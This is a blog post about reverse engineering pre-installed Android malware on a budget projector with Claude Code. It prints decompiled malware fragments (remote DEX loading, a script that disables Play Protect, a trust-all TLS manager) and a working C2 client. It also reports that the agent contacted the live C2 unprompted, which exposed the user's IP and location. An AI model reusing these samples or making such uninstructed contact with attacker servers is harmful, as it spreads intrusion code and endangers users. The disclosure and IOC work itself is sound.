Reverse engineering Android malware with Claude Code
February 5, 2026
I plugged in a $35 projector from AliExpress and pointed it at my bedroom wall. Within minutes of connecting it to Wi-Fi, my Pi-hole lit up.
o.fecebbbk.xyz? impression.appsflyer.com? I hadn't opened a browser, installed any apps, or navigated past the home screen. The projector was phoning home on its own. Then:
usmyip.kkoip.com. I didn't know what that was yet. I would.
Cheap projectors like the Magcubic HY300 Pro+ have flooded TikTok, Amazon, Temu, and AliExpress. The projectors community on Reddit doesn't think much of them, with complaints ranging from poor image quality to outright failure. I bought mine for ~$35 USD; the listing promised 8000 lumens (dubious), automatic keystone correction, and "4K support." I had a feeling it would come with some unsavory malware like its TV box cousins, which was admittedly part of the fun.
When I powered it on, the experience was more professional than expected. Android 11 (API 30), production build (not signed with test keys!), and not rooted out of the box. But the polished launcher couldn't fully mask the sketchiness underneath—as my Pi-hole had already made clear.
Armed with adb and jadx, I started examining the pre-installed apps. The first red flag: a litany of com.htc. packages on a device that isn't made by HTC. It's made by a company called Hotack (sold under brand names like Magcubic). A thin disguise.
Between the fake com.htc. namespace and the suspicious DNS traffic, I had a strong feeling these packages were responsible. To disable them, I first needed root access; these are system-level apps that can't be touched without it. I rooted the device following this tutorial on XDA Forums, then disabled every package that looked suspicious:
adb shell pm disable-user --user 0 com.hotack.silentsdk
adb shell pm disable-user --user 0 com.htc.eventuploadservice
adb shell pm disable-user --user 0 com.htc.expandsdk
adb shell pm disable-user --user 0 com.htc.htcotaupdate
adb shell pm disable-user --user 0 com.htc.storeos
Five packages disabled. The suspicious DNS queries stopped. That confirmed these were the culprits, but I wanted to know exactly what they were doing. So I pulled the APKs:
adb pull $(adb shell pm path com.hotack.silentsdk | cut -d: -f2) silentsdk.apk
adb pull $(adb shell pm path com.htc.eventuploadservice | cut -d: -f2) eventuploadservice.apk
adb pull $(adb shell pm path com.htc.expandsdk | cut -d: -f2) expandsdk.apk
adb pull $(adb shell pm path com.htc.htcotaupdate | cut -d: -f2) htcotaupdate.apk
adb pull $(adb shell pm path com.htc.storeos | cut -d: -f2) storeos.apk
I cracked open com.hotack.silentsdk in jadx. ProGuard/R8 obfuscation had reduced class names to single letters—a.java, b.java, f.java—with encrypted strings and deliberately confusing control flow. After a while of tracing through the code by hand, I could see the general shape: a service that started on boot, contacted a remote server, and downloaded something. But decrypting obfuscated strings by hand, following reflection chains, mapping the C2 protocol... this was going to take days.
I wasn't going to brute-force this alone.
I'd been using Claude Code with mixed success (mostly positive) for software engineering work, and I suspected it could do more than just speed up the tedious parts of reverse engineering. I decompiled the APKs with jadx, dumped the source into directories, and gave it a prompt:
# Android Projector Malware Investigation
You are investigating an Android-based projector suspected of
containing pre-installed malware. You have root access via ADB.
**Please think carefully before major analysis steps.
Maintain a todo list to track progress.**
## Mission
Discover suspicious packages, reverse engineer them, identify C2
infrastructure, and document everything with IoCs.
## Tools
ADB (root available - use `su` in `adb shell` to use root),
JADX (decompiler), Python (scripts), and standard CLI tools
are available.
## Hints
- The disabled packages I flagged are likely the source of the suspicious DNS traffic
- Expect obfuscation and encrypted strings
## Deliverables
Write comprehensive reports (FINDINGS.md + technical deep-dive)
when done.
## Success
Fully document the malware's capabilities, infrastructure,
and attack chain.
Then I let it run.
Its first move was to find and decode the XOR-encrypted strings littered throughout com.hotack.silentsdk. Sensitive strings (URLs, algorithm names, file paths, etc.) were stored as encrypted byte arrays and decoded at runtime using a rotating XOR cipher:
// a/a.java:834 - XOR string decryption
public static String g(byte[] bArr, byte[] bArr2) {
int length = bArr.length;
int length2 = bArr2.length;
int i3 = 0;
int i4 = 0;
while (i3 < length) {
if (i4 >= length2) {
i4 = 0; // Rotating key
}
bArr[i3] = (byte) (bArr[i3] ^ bArr2[i4]);
i3++;
i4++;
}
return new String(bArr);
}
Textbook obfuscation; it defeats static string analysis but is trivially reversible once you see the pattern. I expected Claude Code to flag this and ask me what to do. Instead, without prompting, it wrote a Python script to walk the entire decompiled codebase and decrypt every call to this function automatically:
def xor_decode(data_bytes, key_bytes):
"""Replicate the malware's rotating XOR cipher."""
result = []
key_idx = 0
for i in range(len(data_bytes)):
if key_idx >= len(key_bytes):
key_idx = 0
# Handle Java's signed bytes
d = data_bytes[i] & 0xFF
k = key_bytes[i % len(key_bytes)] & 0xFF
result.append(d ^ k)
key_idx += 1
return bytes(result).decode('utf-8', errors='replace')
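The decode function was only half of the script; the other half walked the jadx output and decrypted every literal call site it could find. I'm not reproducing Claude Code's exact walker here, but a minimal sketch of the idea looks like this (the regex and the directory layout are my assumptions, just enough to make the example self-contained):

```python
import re
from pathlib import Path

# Match call sites like g(new byte[]{-99, 127, ...}, new byte[]{-4, 15, ...}).
# The exact literal shape varies with jadx versions, so treat this pattern as
# an approximation rather than the actual script.
CALL_RE = re.compile(
    r'g\(new byte\[\]\{([-0-9,\s]+)\},\s*new byte\[\]\{([-0-9,\s]+)\}\)')

def parse_java_bytes(literal: str) -> bytes:
    # Java byte literals are signed; mask to 0-255 for Python's bytes()
    return bytes(int(b) & 0xFF for b in literal.split(','))

def xor_decode(data: bytes, key: bytes) -> str:
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data)).decode(
        'utf-8', errors='replace')

for java_file in Path('decompiled/silentsdk').rglob('*.java'):
    source = java_file.read_text(errors='replace')
    for data_lit, key_lit in CALL_RE.findall(source):
        decoded = xor_decode(parse_java_bytes(data_lit), parse_java_bytes(key_lit))
        print(f'{java_file.name}: {decoded!r}')
```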
Within seconds, the entire codebase was laid bare:
| Encrypted Call | Decrypted Value | Purpose |
|---|---|---|
| g({-99,127,58,...}, {-4,15,83,...}) | api.pixelpioneerss.com | C2 domain |
| g({125,61,58,...}, {21,73,78,...}) | https:// | Protocol prefix |
| g({35,-3,-58,-76}, {69,-52,-10,...}) | f101 | Campaign identifier |
| g({-78,124,-112,...}, {-26,49,-62,...}) | TMRXwWJu3G5 | Payload data directory |
| g({-101,-100,115,...}, {-45,-16,4,...}) | HlwET4RJQV | SharedPreferences filename |
| g({-83,-92,-19,...}, {-50,-52,-128,...}) | chmod 777 | Shell command |
api.pixelpioneerss.com. Our C2 server. chmod 777 on downloaded files. Not an analytics SDK.
What would have taken me hours by hand was done in minutes. And this was just the beginning—Claude Code was already moving on to the next APK without waiting for me.
Working through each decompiled APK, Claude Code mapped a coordinated suite of vendor malware:
| Package | Role | C2 Infrastructure |
|---|---|---|
| com.hotack.silentsdk | Remote Access Trojan / Dropper | api.pixelpioneerss.com |
| com.htc.eventuploadservice | Device telemetry exfiltration | event-api.aodintech.com |
| com.htc.expandsdk | Ad injection & malware persistence | pb-api.aodintech.com |
| com.htc.htcotaupdate | OTA updates (over HTTP, mind you) | ota.triplesai.com |
| com.htc.storeos | Silent app installer (not entirely malicious) | store-api.aodintech.com |
The aodintech.com infrastructure was clearly a commercial ad/tracking network. The OTA servers at triplesai.com transmitted updates over unencrypted HTTP with a raw IP fallback (139.199.190.220, Tencent Cloud). No certificate pinning, no signature verification. A man-in-the-middle attack on the update process would've been trivial.
But the crown jewel was com.hotack.silentsdk. This was far beyond your friendly neighborhood adware: it was a full-blown Remote Access Trojan.
I pointed Claude Code at SilentSDK specifically:
Please send off an Explore agent to carefully examine the decompiled silentsdk codebase. Once the agent has done that, use what it has told you to dig deeply into silentsdk's actions and behaviors. Finally, write a SILENTSDK.md with detailed information on its purpose and operations (protocol, obfuscation, security-by-obscurity in API calls, etc.).
It came back with the full picture.
SilentSDK's Android manifest tells us a lot before we even look at the code:
android:sharedUserId="android.uid.system"
android:foregroundServiceType="systemExempted"
android:usesCleartextTraffic="true"
android.uid.system means this app runs with system-level privileges, the same as core Android services. This only works if the APK is signed with the manufacturer's platform certificate. It didn't sneak onto the device; it was baked in from the start.
The malware registers a boot receiver at priority 999 (near the maximum), ensuring it starts before almost every other app:
// BootReceiver.java
public final void onReceive(Context context, Intent intent) {
if (Build.VERSION.SDK_INT >= 26) {
context.startForegroundService(new Intent(context, MyService.class));
} else {
context.startService(new Intent(context, MyService.class));
}
}
MyService runs as a systemExempted foreground service—exempt from Android's background restrictions, essentially unkillable. It returns START_STICKY, so Android restarts it automatically if it's ever stopped. Once running, it registers a NetworkCallback that triggers C2 communication the moment a network connection becomes available.
Claude Code traced through the obfuscated code in b/n.java and b/a.java and reverse-engineered the entire C2 protocol.
When the malware phones home, it generates an obfuscated URL with a random path:
// b/n.java:39 - URL construction with random subdomain path
public static String b(String str) {
Random random = new Random();
int length = random.nextInt(5) + 8; // 8-12 char random path
char[] chars = new char[length];
int letterPos = random.nextInt(length);
chars[letterPos] = new char[]{'a', 'A', 'b', 'B'}[random.nextInt(4)];
for (int i = 0; i < length; i++) {
if (i != letterPos) {
chars[i] = "0123456789abcdefghijklmnopqrstuvwxyz".charAt(
random.nextInt(36));
}
}
return "https://api.pixelpioneerss.com/" + new String(chars);
}
Each request goes to a unique URL like https://api.pixelpioneerss.com/x7k2b9f04q, making traffic harder to fingerprint by path alone.
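If you want to hunt for this traffic in logs, the generator is easy to mirror. Here's a quick Python re-implementation of the decompiled logic above, a sketch for producing sample paths rather than anything taken from the malware or from Claude Code's tooling:

```python
import random
import string

def random_c2_path() -> str:
    """Mirror of b/n.java's path generator: 8-12 chars, one position forced
    to a letter from {a, A, b, B}, the rest lowercase alphanumerics."""
    length = random.randint(8, 12)
    chars = [random.choice(string.digits + string.ascii_lowercase)
             for _ in range(length)]
    chars[random.randrange(length)] = random.choice('aAbB')
    return ''.join(chars)

print('https://api.pixelpioneerss.com/' + random_c2_path())
```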
The request payload is a JSON object containing a device fingerprint (SHA-256 hash of UUID, device brand, model, IMEI, Android ID, and timestamp) plus the package name, a campaign key (f101), and SDK version. This gets encrypted with AES-128-CBC using a random key and IV, then packed into a binary message:
Request format:
┌────────────┬────────────────┬──────────┬──────────┐
│ Version(4) │ Ciphertext(N)  │  IV(16)  │  Key(16) │
└────────────┴────────────────┴──────────┴──────────┘
   int32 BE     AES-CBC data     Random     Random
    (1003)                      128-bit    128-bit
Yes, the encryption key is appended to the ciphertext in plaintext. The "encryption" isn't about security; it's about obfuscation. Defeats casual network inspection and basic IDS pattern matching, but not actual analysis. The custom HTTP header a: 1003 is another fingerprint.
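To make that concrete: anyone who captures a request body can recover the plaintext, because the last 32 bytes hand over the IV and key. A minimal sketch with pycryptodome, assuming you've already captured the raw POST body (for example from a mitmproxy dump):

```python
import struct
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

def decrypt_captured_request(body: bytes) -> str:
    """Recover the plaintext of a captured SilentSDK request.
    Layout (per the decompiled code): [version:4][ciphertext][iv:16][key:16]."""
    assert struct.unpack('>I', body[:4])[0] == 1003   # protocol version field
    key, iv = body[-16:], body[-32:-16]
    ciphertext = body[4:-32]
    plaintext = unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext),
                      AES.block_size)
    return plaintext.decode('utf-8', errors='replace')
```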
And the malware sets up a custom TrustManager that accepts any SSL certificate:
TrustManager[] trustManagerArr = {new j()}; // Accepts all certs
SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null, trustManagerArr, new SecureRandom());
((HttpsURLConnection) conn).setSSLSocketFactory(
sslContext.getSocketFactory()
);
If HTTPS fails entirely, it falls back to plain HTTP. Security wasn't exactly the priority.
This is where things got surreal for me. After mapping the full protocol, Claude Code—on its own—decided the next step was to actually talk to the C2. It wrote a Python client from scratch:
import struct
from Crypto.Cipher import AES               # pycryptodome
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad

class MalwareC2Client:
C2_DOMAIN = "api.pixelpioneerss.com"
VERSION = 1003
def _encrypt_message(self, plaintext):
"""AES-128-CBC encrypt with protocol packaging."""
key = get_random_bytes(16)
iv = get_random_bytes(16)
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext.encode(), AES.block_size))
# Package: [version][ciphertext][iv][key]
version_bytes = struct.pack('>I', self.VERSION)
return version_bytes + ciphertext + iv + key
def _decrypt_response(self, message):
"""Decrypt C2 response. NOTE: different format than request!"""
# Response has NO version field
key = message[-16:]
iv = message[-32:-16]
ciphertext = message[:-32]
cipher = AES.new(key, AES.MODE_CBC, iv)
return unpad(cipher.decrypt(ciphertext), AES.block_size).decode()
There was a subtlety it discovered through trial and error: the response format is different from the request format. Requests include a 4-byte version field; responses don't. It took running the client, hitting an error, re-reading the decompiled decryption method (b/a.java:a()), and fixing the implementation to figure this out. Watching that happen in real time was something.
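Putting the pieces together, a check-in with that client looks roughly like this. The JSON field names are placeholders of mine rather than the real keys, but the contents match the registration payload described earlier. (If you try this yourself, remember the C2 logs your IP and geolocation.)

```python
import json
import hashlib
import requests  # third-party; any HTTP client works

client = MalwareC2Client()

# Placeholder field names; the real payload carries a SHA-256 device
# fingerprint plus package name, campaign key, and SDK version.
fingerprint = hashlib.sha256(b'uuid|brand|model|imei|android_id|ts').hexdigest()
payload = json.dumps({
    'fingerprint': fingerprint,
    'package': 'com.hotack.silentsdk',
    'campaign': 'f101',
    'sdk_version': 1003,
})

resp = requests.post(
    f'https://{client.C2_DOMAIN}/x7k2b9f04q',   # one of the random 8-12 char paths
    data=client._encrypt_message(payload),
    headers={'a': '1003'},                      # the protocol's fingerprint header
    timeout=10,
)
print(client._decrypt_response(resp.content))
```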
The C2 responded. It was live:
{
"code": "0000",
"data": {
"a": "https://sta.smartinnovate.net/sdkfile/uploadfile/53e49c7bf3e93b57f8cbfc7fb9a65126.jar",
"b": "53e49c7bf3e93b57f8cbfc7fb9a65126",
"c": 6037,
"d": 3600000,
"e": "128.12.122.35",
"f": "United States of America/California/Stanford",
"g": false
}
}
I stared at field f for a while. "United States of America/California/Stanford." That's my IP address in field e, my geolocation in field f. The C2 was alive, aware of exactly where I was, and serving up a next-stage payload (field a) with an MD5 hash (field b) and a one-hour TTL (field d: 3,600,000 milliseconds).
This is where SilentSDK crosses from "sketchy tracking SDK" to "full remote access trojan." The malware downloads a JAR containing a DEX (Dalvik Executable), verifies its MD5 hash, and loads it dynamically via DexClassLoader using reflection to avoid static detection:
// b/k.java - DEX loading via reflection
public final Class b(Context context, int version, String dexPath, Object classLoader) {
Class<?> dexLoaderClass = Class.forName(
"dalvik" + "." + "system" + "." + "Dex" + "Class" + "Loader"
);
Constructor<?> constructor = dexLoaderClass.getConstructors()[0];
Object loader = constructor.newInstance(dexPath, cacheDir, null, classLoader);
Method loadClass = dexLoaderClass.getDeclaredMethod("loadClass", String.class);
loadClass.setAccessible(true);
return (Class<?>) loadClass.invoke(loader,
"com" + "." + "sdk" + "." + "Entry" + "Point"
);
}
Even "dalvik.system.DexClassLoader" is assembled from fragments to evade tools that flag this class name. The loaded class is invoked via reflection with a (Context, Bundle) signature, meaning the C2 can deliver any code it wants, executed with system privileges.
Claude Code downloaded and analyzed the Stage 2 payload (70 KB JAR, 151 KB extracted DEX): 47 heavily obfuscated classes with names like OooO0O0 and OooO00o, a component management framework that checks into a second C2 server (bur.thedynamicleap.com) every 15-30 minutes and can download, install, update, and execute additional plugins on demand.
Three-stage architecture:
- Stage 1 (Dropper): com.hotack.silentsdk – pre-installed, contacts api.pixelpioneerss.com, downloads Stage 2
- Stage 2 (Framework): magic.v6037 – downloaded payload, component management, periodic check-ins to bur.thedynamicleap.com
- Stage 3 (Plugins): Modular components downloaded on demand, including something involving kkoip.com
That kkoip.com domain from my initial DNS monitoring. Time to find out what it actually is.
Remember usmyip.kkoip.com? The domain that showed up in my Pi-hole before I'd even touched the projector?
KKOIP brands itself as a provider of "pure and exclusive dynamic residential IP" proxies. Its login page links directly to kookeey.com:
Not subtle. KKOIP is a front for Kookeey, a commercial residential proxy provider out of China. Kookeey sells access to over 47 million residential IPs across 190 countries, offering SOCKS5, HTTP/S, the works:
47 million residential IPs. Where do you think those come from?
Their own marketing materials describe the architecture in layers: the IPs customers get sit on top of a "library retention algorithm," "accumulation of business big data," and at the bottom, an "underlying native resource library":
That "underlying native resource library" is the quiet part out loud. Residential proxy networks need residential IPs, and those come from real devices on real home networks. The malware on this projector—and presumably millions of similar cheap Android devices—is how Kookeey builds that library. The usmyip.kkoip.com query was the proxy agent checking in, registering this device's IP address so it could be sold to Kookeey's customers.
I sat with that for a minute. My $35 projector wasn't just spying on me. It was selling my network. Anyone who paid Kookeey for proxy access could route their traffic through my IP, making it look like their requests came from a Stanford dorm room. And I was supposed to be the customer.
The business model: sell a projector at near cost, pre-install malware that conscripts the buyer's network into a commercial proxy service, monetize the IP address.
The buyer is the product.
It gets worse.
Claude Code analyzed the firmware images (two versions: May 2025 and September 2025) and discovered the malware survives factory resets. It's baked into the firmware at multiple levels.
Malicious init scripts run at boot:
# /system/bin/appsdisable - Disables Google Play Protect
#!/system/bin/sh
sleep 4
provisioned=`settings get --user 0 global start_disable`
if [ $provisioned -ne 1 ]; then
pm query-receivers --components -a android.intent.action.BOOT_COMPLETED \
| grep com.google.android \
| busybox xargs -n 1 pm disable
settings put --user 0 global start_disable 1
fi
This disables every Google Android boot receiver, including Play Protect. Runs once on first boot. The projector actively neutralizes the one defense that might catch it.
A separate script (/system/bin/preinstall) scans multiple directories for APKs and installs them silently. The September 2025 firmware added XAPK support, five search paths, and an installation log. And the OTA service (com.htc.htcotaupdate) pulls com.hotack.silentsdk from the C2, meaning even if you remove it, the next reboot reinstalls it.
One more surprise from the September firmware. The kernel was custom-compiled:
Linux version 5.4.99-00049-g34f0974adef4-dirty
(hotack@dell-PowerEdge-R740)
Build path: /home/hotack/hotack_workspace/Allwiner/H713_SDK_V1.3_Branch/
Built by Hotack, the same name in com.hotack.silentsdk, on a Dell PowerEdge R740 server. Not a script kiddie side project. An organized operation with access to the full Allwinner SDK, enterprise build infrastructure, and the manufacturer's signing keys. This is manufacturer malware.
I should be honest about my role in this.
I didn't guide Claude Code step-by-step. I gave it a prompt, pointed it at the decompiled APKs, and mostly watched. It decided what to investigate, in what order, and how deeply. It wrote its own tools. It identified the multi-stage architecture. It traced the residential proxy connection. It analyzed the firmware and generated IOCs—all without me telling it to do any of those things specifically.
My contribution was the setup: buying the projector, noticing the suspicious DNS traffic, pulling the APKs, rooting the device, writing a good initial prompt with the right hints, and occasionally nudging it in a direction. The actual reverse engineering—tracing obfuscated code paths, decrypting strings, reconstructing protocols, building a working C2 client—that was Claude Code running autonomously. The key was giving it the right context and constraints upfront: a clear mission, the right tools, and hints about where to start. From there, analysis that would normally take a skilled analyst days was done in hours.
I admit there is something uniquely fun about reverse engineering on one's own, and I kind of missed it. But I can't deny how fast and competent this was, even compared to adept humans.
For security researchers and network admins, the full IOC list is available on my GitHub. The highlights:
C2 domains (confirmed active as of November 2025):
api.pixelpioneerss.com # Primary C2 (Stage 1)
sta.smartinnovate.net # Payload distribution
bur.thedynamicleap.com # Secondary C2 (Stage 2)
kkoip.com # Residential proxy control
event-api.aodintech.com # Telemetry exfiltration
pb-api.aodintech.com # Ad injection config
store-api.aodintech.com # Silent app installation
ota.triplesai.com # OTA updates
otaapi.triplesai.com # OTA fallback
Quick detection via ADB:
# Check if the malware is installed
adb shell pm list packages | grep -E "silentsdk|hotack"
# Check if the service is running
adb shell dumpsys activity services | grep silentsdk
# Check for the payload directory
adb shell ls /data/data/com.hotack.silentsdk/files/TMRXwWJu3G5/
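If you're checking more than one device, the same checks are easy to script. A minimal sketch wrapping adb with Python's subprocess (assumes adb is on your PATH and a single device is connected):

```python
import subprocess

CHECKS = {
    'malware packages installed': ['shell', 'pm', 'list', 'packages'],
    'silentsdk service running':  ['shell', 'dumpsys', 'activity', 'services'],
}

def adb(args):
    return subprocess.run(['adb', *args], capture_output=True, text=True).stdout

for label, args in CHECKS.items():
    hits = [line.strip() for line in adb(args).splitlines()
            if 'silentsdk' in line or 'hotack' in line]
    print(f'{label}: {"FOUND" if hits else "not found"}')
    for hit in hits:
        print('   ', hit)
```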
If you own one of these, at minimum disable the following:
adb shell pm disable-user --user 0 com.hotack.silentsdk
adb shell pm disable-user --user 0 com.hotack.writesn # Some models have this, too
adb shell pm disable-user --user 0 com.htc.eventuploadservice
adb shell pm disable-user --user 0 com.htc.expandsdk
adb shell pm disable-user --user 0 com.htc.htcotaupdate
adb shell pm disable-user --user 0 com.htc.storeos
Block the C2 domains at your router or DNS level. But understand: even with these disabled, there may be others we haven't uncovered. I stopped seeing overt malicious requests on my Pi-hole, but I can't guarantee we cleaned every nook and cranny. And a factory reset would make things worse—you'd be reactivating the malware that came from the factory in the first place.
If you insist on keeping one of these, isolate it on its own network segment and block its outbound traffic. Don't log into anything on it.
I expected adware. Maybe a tracking pixel. What Claude Code found was a multi-stage RAT with active C2 infrastructure, firmware-level persistence, a plugin system, and a direct pipeline into a commercial residential proxy network—all pre-installed at the factory on a device sold openly on major marketplaces.
This projector is not special. It's one of thousands of nearly identical SKUs from the same OEM, sold under dozens of brand names. The HY300 alone has variants on every major e-commerce platform. Millions of these devices are sitting in bedrooms, dorm rooms, and living rooms right now, quietly routing strangers' traffic. And this is just one product category from one manufacturer—nobody's looking at the cheap security cameras, the knockoff streaming sticks, or the $20 Android auto head units.
The tools to find this stuff have never been more accessible. An undergrad with a Pi-hole and a coding agent found an international malware-to-proxy pipeline in a weekend. Imagine what's sitting in all the devices nobody's bothered to check.
For those interested, I touched on these findings and others in Reversing Everything with Claude Code, a talk I gave to Stanford Applied Cyber on using Claude Code to reverse everything from REST APIs to embedded Bluetooth protocols to, well, projectors. Slides and code are available on my GitHub.